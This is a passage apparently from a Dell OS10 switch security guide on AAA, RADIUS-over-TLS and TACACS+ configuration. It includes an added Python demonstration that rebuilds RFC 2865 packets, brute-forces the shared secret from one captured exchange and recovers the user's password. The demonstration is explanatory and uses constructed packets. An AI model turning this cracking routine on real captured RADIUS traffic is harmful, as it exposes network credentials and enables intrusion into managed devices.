API Guide
● stop-only—Send only a stop notice when a process ends.
● none—No accounting notices are sent.
● logging—Logs all accounting notices in syslog.
● group tacacs+—Sends all accounting notices to the first reachable TACACS+ server.
The methods in the method list are used in the order they are configured; if the first method is unavailable, the next one is tried.
Enable AAA re-authentication or enable mode
Rationale: Prevent users from accessing resources or performing tasks that they are not authorized to perform, and require users to
reauthenticate by logging in again when an authentication method or server changes, so that sessions established under the old configuration do not outlive it.
Configuration:
OS10(config)# aaa re-authenticate enable
Configure RADIUS authentication
Rationale: Traditional RADIUS-based user authentication runs over UDP and relies only on a shared secret and the MD5 message-digest
algorithm to hide the User-Password attribute and to authenticate server responses; the rest of each packet travels in clear text, and
MD5 with a shared secret is no longer considered adequate protection for this exchange. RFC 6614 defines the RADIUS over
Transport Layer Security (TLS) protocol, which carries the entire authentication exchange inside a TLS connection and uses X.509
certificates to authenticate the peers, providing confidentiality and integrity that legacy RADIUS lacks.
Configuration:
OS10(config)# radius-server host {hostname | ip-address} tls security-profile profile-name [auth-port port-number] key {0 authentication-key | 9 authentication-key | authentication-key}
OS10(config)# exit
OS10# write memory
● hostname—Enter the hostname of the RADIUS server.
● ip-address—Enter the IPv4 (A.B.C.D) or IPv6 (x:x:x:x::x) address of the RADIUS server.
● tls security-profile profile-name—Enter the security profile to use the X.509v3 certificate on the switch to
use for TLS authentication with a RADIUS server.
● key 0 authentication-key—Enter an authentication key in plain text. A maximum of 42 characters.
● key 9 authentication-key—Enter an authentication key in encrypted format. A maximum of 128 characters.
● authentication-key—Enter an authentication key in plain text. A maximum of 42 characters. It is not necessary to enter 0
before the key.
● auth-port port-number—(Optional) Enter the port number used on the server for authentication, from 0 to 65535; the
default is 1812. RFC 6614 assigns TCP port 2083 to RADIUS over TLS, so set this to the port on which your RADIUS/TLS server
actually listens.
● key authentication-key—(Optional) Enter the authentication key used to authenticate the device on the server. A
maximum of 42 characters; default radius_secure. Do not keep the default: a key that is printed in documentation is not a secret.
RFC 6614 fixes the RADIUS/TLS shared secret to the string radsec, so use whatever value your RADIUS/TLS server expects.
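The following is an added example, not code from the OS10 guide or from Dell, that shows concretely why the rationale above calls legacy RADIUS weak. It implements the RFC 2865 User-Password hiding scheme and the Response Authenticator, then demonstrates that an observer who captures a single Access-Request/Access-Accept pair can brute-force a weak shared secret offline and recover the user's password. The packets, the user name admin, the password and the wordlist are all constructed for the demonstration; the shared secret used is the documented default radius_secure from the parameter list above, precisely because a documented default belongs on every attacker's wordlist.

```python
"""Added example (not from the OS10 guide): RFC 2865 password hiding and
Response Authenticator, and the offline attack a captured exchange permits.
All packets below are constructed in this file; nothing is sent on the wire."""
import hashlib
import struct
from typing import Optional

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16-octet blocks; each block is XORed with
    MD5(secret + previous ciphertext block), the first block with the
    Request Authenticator. There is no per-session key, only the shared secret."""
    if not password or len(password) > 128:
        raise ValueError("User-Password must be 1..128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out += prev
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password. Trailing NUL padding is stripped, so a password
    that itself ends in NUL octets is not recoverable exactly (RFC 2865 ambiguity)."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ m for c, m in zip(hidden[i:i + 16], mask))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def _attr(kind: int, value: bytes) -> bytes:
    return struct.pack("!BB", kind, len(value) + 2) + value


def parse_attrs(packet: bytes) -> dict:
    """Return {type: value} for the TLV attributes after the 20-octet header."""
    attrs, i = {}, 20
    while i < len(packet):
        kind, length = packet[i], packet[i + 1]
        if length < 2 or i + length > len(packet):
            raise ValueError("malformed attribute")
        attrs[kind] = packet[i + 2:i + length]
        i += length
    return attrs


def build_request(user: bytes, password: bytes, secret: bytes,
                  request_auth: bytes, ident: int = 1) -> bytes:
    """Access-Request: Code, Identifier, Length, Request Authenticator, attributes."""
    attrs = _attr(ATTR_USER_NAME, user) + _attr(
        ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs))
    return header + request_auth + attrs


def response_authenticator(header: bytes, request_auth: bytes,
                           attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code+ID+Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_accept(request: bytes, secret: bytes) -> bytes:
    """Access-Accept with no attributes, echoing the request's Identifier."""
    header = struct.pack("!BBH", ACCESS_ACCEPT, request[1], 20)
    return header + response_authenticator(header, request[4:20], b"", secret)


def crack_secret(request: bytes, response: bytes, wordlist) -> Optional[bytes]:
    """Every input to the Response Authenticator except the secret is visible on
    the wire, so one captured pair is an offline oracle for guessing the secret."""
    request_auth, header, attrs = request[4:20], response[:4], response[20:]
    for guess in wordlist:
        if response_authenticator(header, request_auth, attrs, guess) == response[4:20]:
            return guess
    return None


def recover_password(request: bytes, response: bytes, wordlist) -> Optional[bytes]:
    """Recover the secret from the response, then unhide the captured password."""
    secret = crack_secret(request, response, wordlist)
    if secret is None:
        return None
    return unhide_password(parse_attrs(request)[ATTR_USER_PASSWORD], secret, request[4:20])


if __name__ == "__main__":
    # Constructed capture: a switch authenticating "admin" with the documented
    # default key. A real client would use a random Request Authenticator.
    secret = b"radius_secure"
    request_auth = bytes(range(16))
    req = build_request(b"admin", b"Sup3r-s3cret!", secret, request_auth)
    resp = build_accept(req, secret)
    print("user name on the wire:", parse_attrs(req)[ATTR_USER_NAME])
    print("recovered password:", recover_password(req, resp, [b"testing123", b"radius_secure"]))
```

The user name, NAS identity and every attribute other than User-Password are readable by anyone on the path, and the password itself falls as soon as the secret is guessed; this is the exposure that wrapping the exchange in TLS, as configured above, removes. The same weakness is why the shared key in the radius-server command must be long and unique even when TLS is in use, since the key still participates in the RADIUS layer.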
Configure RADIUS authentication retries
Rationale: Configure the number of times OS10 retransmits a RADIUS authentication request before giving up on a server. A lower value
limits how long an unreachable server delays a login before the next server or method in the list is tried; 0 disables retransmission.
Configuration:
OS10(config)# radius-server retransmit retries
OS10(config)# exit
OS10# write memory
retries—Enter the number of retry attempts, from 0 to 100.
Configure TACACS+ authentication
Rationale: Define the TACACS+ server that OS10 contacts for authentication and the shared key used to authenticate to it. Keep the global
timeout that OS10 waits for a TACACS+ authentication response short so that an unreachable server does not block logins for long.
Configuration:
OS10(config)# tacacs-server host {hostname | ip-address} key {0 authentication-key | 9 authentication-key | authentication-key} [auth-port port-number]
OS10(config)# exit
OS10# write memory
OS10 security best practices